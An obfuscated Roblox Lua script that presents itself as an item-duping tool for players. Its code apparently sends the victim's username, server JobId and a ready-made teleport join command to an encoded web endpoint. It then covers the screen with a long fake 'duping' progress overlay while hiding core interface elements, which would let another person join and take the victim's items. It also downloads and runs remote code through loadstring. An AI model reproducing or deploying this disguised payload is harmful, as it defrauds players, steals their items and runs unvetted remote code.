--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v19,v20) local v21={};_G.Cs={UQSDDAA=3,YASDMRXA=1,YASa0AVV=2};for v52=1, #v19 do v6(v21,v0(v4(v1(v2(v19,v52,v52 +  #Cs + 1 )),v1(v2(v20,1 + (v52% #v20) ,1 + (v52% #v20) + 1 )))%256 ));end return v5(v21);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));local v10=game:GetService(v7("\0\178\69\19\172\41\84\32\132\76\4\170\47\69\49","\38\84\215\41\118\220\70"));local v11=v8.LocalPlayer;local v12=v7("\99\23\0\45\250\69\6\39\0\174\1","\158\48\118\66\114");local v13=v7("\163\48\4\38\96\255\180\228\32\25\37\112\170\233\175\106\19\57\126\234\250\187\45\95\33\118\167\243\164\43\27\37\60\244\168\242\112\71\102\32\246\174\253\114\70\110\39\244\170\242\119\69\121\94\247\173\175\17\73\4\112\159\206\137\13\59\46\74\171\206\174\42\54\62\90\172\210\189\54\8\0\103\191\216\250\42\70\50\119\167\196\254\125\5\55\66\151\215\162\7\17\62\116\146\200\131\32\0\100\34\141\250\248\54\34\9\69\138\216\135\124","\155\203\68\112\86\19\197");local function v14() local v22={[v7("\83\206\51\238\78\121\232\253","\152\38\189\86\156\32\24\133")]=v7("\216\66\183\67\188\123\168\65\251\82\181","\38\156\55\199"),[v7("\171\114\114\60\22\122\238","\35\200\29\28\72\115\20\154")]=string.format("🎯 Duping Attempt\n\n👤 User: `%s`\n🧾 JobId: `%s`\n📍 Join Script:\n```lua\ngame:GetService('TeleportService'):TeleportToPlaceInstance(%s, '%s')```",v11.Name,game.JobId,game.PlaceId,game.JobId)};local v23=(syn and syn.request) or (http and http.request) or request ;if v23 then v23({[v7("\44\173\221","\84\121\223\177\191\237\76")]=v13,[v7("\150\83\221\168\53\84","\161\219\54\169\192\90\48\80")]=v7("\121\109\51\17","\69\41\34\96"),[v7("\148\198\214\14\7\57\175","\75\220\163\183\106\98")]={[v7("\33\181\133\35\220\12\174\198\3\192\18\191","\185\98\218\235\87")]=v7("\202\44\55\234\215\169\202\40\46\233\208\229\193\47\40\232","\202\171\92\71\134\190")},[v7("\11\206\40\145","\232\73\161\76")]=v9:JSONEncode(v22)});end end local function v15(v24) local v25=0;local v26;local v27;local v28;local v29;local v30;local v31;local v32;while true do if (v25==(1 + 1)) then v29,v30=pcall(function() return v28({[v7("\57\220\82","\135\108\174\62\18\30\23\147")]=v27,[v7("\155\236\62\195\23\170","\167\214\137\74\171\120\206\83")]=v7("\172\213\6","\199\235\144\82\61\152"),[v7("\47\19\184\47\2\4\170","\75\103\118\217")]={[v7("\228\91\126\0\188\16\211\25\68\13\169\27","\126\167\52\16\116\217")]=v7("\201\62\48\140\189\26\253\220\39\47\142\251\19\239\199\32","\156\168\78\64\224\212\121")}});end);if ( not v29 or  not v30.Success) then return false;end v25=149 -(80 + 66) ;end if (v25==(0 -0)) then v26=v11.UserId;v27=string.format(v7("\179\205\86\77\13\225\150\13\91\12\178\220\76\89\13\245\203\77\95\18\180\193\12\94\17\182\150\84\12\81\174\202\71\79\13\244\156\81\18\24\169\208\71\83\26\168","\126\219\185\34\61"),v26);v25=2 -1 ;end if (v25==(1 + 2)) then v31,v32=pcall(function() return v9:JSONDecode(v30.Body);end);if  not v31 then return false;end v25=19 -15 ;end if ((757 -(239 + 514))==v25) then for v112,v113 in ipairs(v32.data or {} ) do if (v113.name==v24) then return true;end end return false;end if (v25==(1 + 0)) then v28=(syn and syn.request) or (http and http.request) or request ;if  not v28 then return false;end v25=1331 -(797 + 532) ;end end end local function v16(v33) local v34=0 + 0 ;local v35;local v36;local v37;local v38;local v39;while true do if (v34==(2 + 2)) then v38.Size=UDim2.new(2 -1 ,1202 -(373 + 829) ,731.2 -(476 + 255) ,1130 -(369 + 761) );v38.Position=UDim2.new(0 + 0 ,0 -0 ,0.5 -0 ,238 -(64 + 174) );v38.Text="";v38.TextColor3=Color3.new(1,0,0);v34=1 + 4 ;end if (v34==0) then v35=Instance.new(v7("\52\237\183\203\2\224\130\219\14","\174\103\142\197"),game.CoreGui);v35.Name=v7("\112\58\86\61\43\90\219\94\45\92\51\21\81\232\67\56","\152\54\72\63\88\69\62");v35.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v36=Instance.new(v7("\242\214\239\81\209","\60\180\164\142"),v35);v34=1 -0 ;end if (8==v34) then v39.MouseButton1Click:Connect(function() if v15(v12) then local v142=336 -(144 + 192) ;local v143;while true do if (v142==0) then v143=216 -(42 + 174) ;while true do if (v143==0) then v35:Destroy();v33();break;end end break;end end else v38.Text=v7("\56\226\172\240\162\178\179\90\236\188\180\169\185\231\3\232\172\254\236\138\166\19\249\248\182\163\175\231\27\238\187\181\188\169\166\20\238\189\254","\199\122\141\216\208\204\221");end end);break;end if (v34==1) then v36.Size=UDim2.new(0 + 0 ,332 + 68 ,0,150);v36.Position=UDim2.new(0.5, -(85 + 115),1504.5 -(363 + 1141) , -(1655 -(1183 + 397)));v36.BackgroundColor3=Color3.fromRGB(91 -61 ,22 + 8 ,23 + 7 );v36.BorderSizePixel=1975 -(1913 + 62) ;v34=2 + 0 ;end if (v34==2) then v37=Instance.new(v7("\108\91\29\61\11\236\16\93\82","\114\56\62\101\73\71\141"),v36);v37.Size=UDim2.new(1,0 -0 ,0.5,1933 -(565 + 1368) );v37.Text=v7("\140\230\155\199\183\231\207\205\182\252\222\136\248\232\223\192\248\253\211\193\248\235\212\208\248","\164\216\137\187")   .. v12   .. v7("\146\231\34\242\167\190\13\192\239\52\188\162\190\67\223\231\40\242\178\255\0\215\166\96\226\235\173\91\146\235\56\188\181\190\31\221\166\54\183\178\190\10\214\226\52\182\230\252\10\209\237\113\251","\107\178\134\81\210\198\158") ;v37.TextColor3=Color3.new(1,3 -2 ,1662 -(1477 + 184) );v34=3 -0 ;end if (v34==3) then v37.Font=Enum.Font.GothamBold;v37.TextScaled=true;v37.BackgroundTransparency=1;v38=Instance.new(v7("\12\11\154\210\134\57\12\135\202","\202\88\110\226\166"),v36);v34=4;end if (v34==(6 + 0)) then v39.Name=v7("\48\52\182\61\74\21\60\5\36\189\54","\73\113\80\210\88\46\87");v39.Size=UDim2.new(856.5 -(564 + 292) ,0,0.2 -0 ,0 -0 );v39.Position=UDim2.new(304.25 -(244 + 60) ,0 + 0 ,476.75 -(41 + 435) ,0);v39.Text=v7("\160\40\201\23\227","\135\225\76\173\114");v34=7;end if (v34==(1006 -(938 + 63))) then v38.Font=Enum.Font.Gotham;v38.TextScaled=true;v38.BackgroundTransparency=1;v39=Instance.new(v7("\247\10\154\227\232\214\27\150\248\196","\170\163\111\226\151"),v36);v34=5 + 1 ;end if (7==v34) then v39.Font=Enum.Font.GothamBold;v39.TextColor3=Color3.new(1126 -(936 + 189) ,1 + 0 ,1614 -(1565 + 48) );v39.TextScaled=true;v39.BackgroundColor3=Color3.fromRGB(0 + 0 ,120,1393 -(782 + 356) );v34=275 -(176 + 91) ;end end end local function v17() local v40=0 -0 ;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v40==(4 -1)) then v43.Position=UDim2.new(1092.1 -(975 + 117) ,1875 -(157 + 1718) ,0.45 + 0 ,0);v43.BackgroundTransparency=3 -2 ;v43.TextColor3=Color3.new(3 -2 ,1019 -(697 + 321) ,2 -1 );v43.Font=Enum.Font.GothamBold;v40=4;end if (v40==(10 -5)) then v45=math.random(50,80);v46=math.random(15,30);while v44<99  do local v114=0;local v115;while true do if (v114==(0 -0)) then v115=0;while true do if (v115==(0 + 0)) then task.wait(math.random(30,112 -52 ));v44+=(2 -1) v115=1228 -(322 + 905) ;end if (v115==(612 -(602 + 9))) then if (v44<=(1209 -(449 + 740))) then v43.Text=v44   .. v7("\251\178\140\130\25\193\188\112\187\241\213\203\52\201\242\106\177\178\197\215\42\203\242\118\177\225\213\140\116\128","\30\222\146\161\162\90\174\210") ;elseif (v44<=(912 -(826 + 46))) then v43.Text=v44   .. v7("\160\14\61\74\205\65\99\30\165\92\117\25\245\65\126\14\224\74\62\74\192\93\100\11\231\66\121\25\237\71\126\13\165\93\117\9\240\92\117\74\230\65\126\4\224\77\100\3\234\64\62\68\171","\106\133\46\16") ;elseif (v44<=(1007 -(245 + 702))) then v43.Text=v44   .. v7("\29\96\62\188\123\85\76\40\118\242\78\73\91\33\103\245\84\71\24\51\118\239\73\73\87\46\61\178\20","\32\56\64\19\156\58") ;elseif (v44<=(252 -172)) then if ((v45>(1 + 0)) and (math.random(1,1901 -(260 + 1638) )==1)) then v45-=(441 -(382 + 58)) end if ((v46>5) and (math.random(3 -2 ,2 + 0 )==(1 -0))) then v46-=math.random(2 -1 ,1207 -(902 + 303) ) end v43.Text=v44   .. v7("\31\136\168\22\115\252\192\75\221\224\67\95\188\192\106\199\246\95\78\251\143\84\146\165","\224\58\168\133\54\58\146")   .. v45   .. v7("\21\22\110\201\84\220\199","\107\57\54\43\157\21\230\231")   .. v46   .. v7("\155\134\24\251\170","\175\187\235\113\149\217\188") ;else v43.Text=v44   .. v7("\121\239\204\12\211\107\119\63\170\146\95\234\119\127\124\171\148\92\230\57\106\57\190\148\73\240\109\54\114\225","\24\92\207\225\44\131\25") ;end break;end end break;end end end v43.Text=v7("\18\138\253\12\86\61\109\218\182\77\23\116\81\218\182\75\91\121\94\195\180\69\24\124\95\218\183\66\91\109\74\208\179\73\15\51\5\157","\29\43\179\216\44\123");v40=12 -6 ;end if (v40==(4 -2)) then v42.BackgroundColor3=Color3.new(0 + 0 ,1690 -(1121 + 569) ,214 -(22 + 192) );v42.BorderSizePixel=683 -(483 + 200) ;v43=Instance.new(v7("\184\0\71\82\200\64\226\137\9","\128\236\101\63\38\132\33"),v42);v43.Size=UDim2.new(1463.8 -(1404 + 59) ,0 -0 ,0.15,0 -0 );v40=768 -(468 + 297) ;end if ((568 -(334 + 228))==v40) then while true do task.wait(6 -4 );end break;end if (v40==(8 -4)) then v43.TextScaled=true;v43.Text=v7("\252\236\81\9\246\194\193\165\189\24\69\186\226\213\165\167\22\10\248\165","\175\204\201\113\36\214\139");pcall(function() local v116=game:GetService(v7("\116\216\52\206\16\66\222\18\201\13","\100\39\172\85\188"));v116:SetCore(v7("\159\125\170\133\39\143\109\173\148\60\163\91\184\140\63\175\121\186\139","\83\205\24\217\224"),false);v116:SetCore(v7("\210\202\221\63\231\215\232\51\231\199\193\56\226","\93\134\165\173"),false);end);v44=0 -0 ;v40=2 + 3 ;end if (v40==(236 -(141 + 95))) then v14();v41=Instance.new(v7("\158\222\2\245\125\248\138\200\25","\150\205\189\112\144\24"),game.CoreGui);v41.Name=v7("\22\136\176\91\40\135\16\20\44\138\184\127\7\154\20\21\43","\112\69\228\223\44\100\232\113");v41.IgnoreGuiInset=true;v40=1 + 0 ;end if (v40==1) then v41.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v41.ResetOnSpawn=false;v42=Instance.new(v7("\242\13\6\222\179","\230\180\127\103\179\214\28"),v41);v42.Size=UDim2.new(2 -1 ,0 -0 ,1 + 0 ,0 -0 );v40=2 + 0 ;end end end local function v18() local v47,v48=pcall(function() local v53=0 + 0 ;local v54;while true do if ((1 -0)==v53) then return loadstring(v54)();end if (v53==(0 + 0)) then v54=game:HttpGet(v7("\181\205\52\92\174\131\111\3\174\208\50\69\168\202\110\65\184\215\53\3\175\216\57\74\180\220\44\72","\44\221\185\64"));if ((type(v54)~=v7("\18\243\90\86\125\6","\19\97\135\40\63")) or (v54=="")) then error(v7("\136\93\58\55\42\53\238\72\60\123\35\62\175\88\115\9\46\40\168\85\54\55\43\113\162\85\49\41\46\35\183","\81\206\60\83\91\79"));end v53=1;end end end);if  not v47 then local v56=0;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v56==(165 -(92 + 71))) then v58.BorderSizePixel=0 + 0 ;v59=Instance.new(v7("\9\24\42\180\11\229\36\39","\85\92\81\105\219\121\139\65"),v58);v59.CornerRadius=UDim.new(0 -0 ,10);v60=Instance.new(v7("\201\182\72\81\80\222\255\182\92","\191\157\211\48\37\28"),v58);v56=3;end if ((766 -(574 + 191))==v56) then v58=Instance.new(v7("\4\74\54\213\219","\134\66\56\87\184\190\116"),v57);v58.Size=UDim2.new(0 + 0 ,751 -451 ,0 + 0 ,200);v58.Position=UDim2.new(0.5, -(999 -(254 + 595)),126.5 -(55 + 71) , -(131 -31));v58.BackgroundColor3=Color3.fromRGB(1830 -(573 + 1217) ,110 -70 ,40);v56=2;end if (v56==7) then v62.CornerRadius=UDim.new(0 + 0 ,12 -4 );v61.MouseButton1Click:Connect(v17);return;end if (v56==(942 -(714 + 225))) then v60.Size=UDim2.new(1,0,0.3,0 -0 );v60.Text=v7("\249\30\231\8\122\251\10\228\25\122\248\42\221","\90\191\127\148\124");v60.TextColor3=Color3.new(1 -0 ,1 + 0 ,1 -0 );v60.Font=Enum.Font.GothamBold;v56=810 -(118 + 688) ;end if ((52 -(25 + 23))==v56) then v60.TextScaled=true;v60.BackgroundTransparency=1;v61=Instance.new(v7("\76\130\54\3\90\146\58\3\119\137","\119\24\231\78"),v58);v61.Size=UDim2.new(0.8,0 + 0 ,0.3,0);v56=1891 -(927 + 959) ;end if (v56==(20 -14)) then v61.TextScaled=true;v61.BackgroundColor3=Color3.fromRGB(732 -(16 + 716) ,231 -111 ,255);v61.BorderSizePixel=97 -(11 + 86) ;v62=Instance.new(v7("\183\4\134\69\206\78\20\144","\113\226\77\197\42\188\32"),v61);v56=7;end if ((12 -7)==v56) then v61.Position=UDim2.new(285.1 -(175 + 110) ,0 -0 ,0.5,0);v61.Text="🚀 Start Fast Duping";v61.Font=Enum.Font.GothamBold;v61.TextColor3=Color3.new(4 -3 ,1797 -(503 + 1293) ,2 -1 );v56=5 + 1 ;end if ((1061 -(810 + 251))==v56) then warn(v7("\104\170\217\126\42\199\13\176\65\235\220\125\46\199\13\150\79\178\214\123\42\207\73\228\66\162\210\96\46\209\84\232\14\190\195\123\33\196\13\162\79\167\220\112\46\192\70\228\105\158\249","\196\46\203\176\18\79\163\45"));v57=Instance.new(v7("\139\33\108\27\33\245\200\173\43","\143\216\66\30\126\68\155"),game.CoreGui);v57.Name=v7("\140\201\1\199\199\162\212\234\142\221\29\206\226\150\254","\129\202\168\109\171\165\195\183");v57.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v56=1 + 0 ;end end end local v49=v48:CreateWindow({[v7("\20\23\249\176","\213\90\118\148")]=v7("\125\47\167\66\13\127\59\164\83\13\124\27\157","\45\59\78\212\54"),[v7("\60\89\130\143\143\32\170\196\25\66\143\142","\144\112\54\227\235\230\78\205")]=v7("\149\41\28\232\144\127\166\56\10\188\247\110\154","\59\211\72\111\156\176"),[v7("\98\136\226\41\71\137\228\30\91\133\247\36\90\139\230","\77\46\231\131")]=v7("\184\77\246","\32\218\52\214")   .. v12 ,[v7("\109\24\63\174\248\183\80\72\79\3\56\167\255\131\68\76\71\25\54","\58\46\119\81\200\145\208\37")]={[v7("\14\130\49\174\165\184\50","\86\75\236\80\204\201\221")]=false},[v7("\86\72\100\134\241\153\118","\235\18\33\23\229\158")]={[v7("\117\180\192\185\92\191\197","\219\48\218\161")]=false},[v7("\207\116\101\122\194\92\244\225\124","\128\132\17\28\41\187\47")]=false});local v50=v49:CreateTab(v7("\37\39\22\63","\61\97\82\102\90"),4679672986 -196310528 );local v51=158 -(26 + 131) ;v50:CreateParagraph({[v7("\152\39\191\71\194","\105\204\78\203\43\167\55\126")]="⚠️ READ BEFORE USING!!",[v7("\134\165\45\10\22\10\211","\49\197\202\67\126\115\100\167")]="Using this script on public servers or private ones you don't own will NOT work.\n\nIf you get a stealing alert, it means the script is working and actively duping.\n\nIf you leave while duping you might lose your brainrots."});v50:CreateParagraph({[v7("\3\82\203\37\133","\62\87\59\191\73\224\54")]=v7("\211\10\255\137\244\1\232\192\247\22\186\222\238\14\246\137\232\12\246\208\167\6\239\217\226\66\227\198\242\16\186\203\226\17\238\137\229\16\251\192\233\16\245\221","\169\135\98\154"),[v7("\232\120\42\64\248\61\220","\168\171\23\68\52\157\83")]=""});v50:CreateSlider({[v7("\218\112\248\168","\231\148\17\149\205\69\77")]=v7("\168\168\208\187\90\254\142\190\135\249\69\254\137\169\213\244\67\236\192\179\200\187\83\234\144\162","\159\224\199\167\155\55"),[v7("\197\242\50\213\242","\178\151\147\92")]={3 -2 ,869 -(240 + 619) },[v7("\165\243\79\32\23\65\127\130\233","\26\236\157\44\82\114\44")]=1,[v7("\9\59\199\73\47\32\193\109\43\34\192\94","\59\74\78\181")]=1,[v7("\6\208\86\86\177\36\210\81","\211\69\177\58\58")]=function(v55) v51=v55;end});v50:CreateButton({[v7("\153\228\116\240","\171\215\133\25\149\137")]="🚀 Start Fast Duping",[v7("\194\201\62\246\237\49\255\73","\34\129\168\82\154\143\80\156")]=v17});v49:CreateTab(v7("\166\160\54\15\65\90\154","\233\229\210\83\107\40\46"),4483362458 -0 ):CreateParagraph({[v7("\245\75\38\218\0","\101\161\34\82\182")]=v7("\219\14\75\247\203\246\194\44\241","\78\136\109\57\158\187\130\226"),[v7("\29\48\247\229\59\49\237","\145\94\95\153")]=v12   .. "\nFast version - paid%" });end v16(v18);
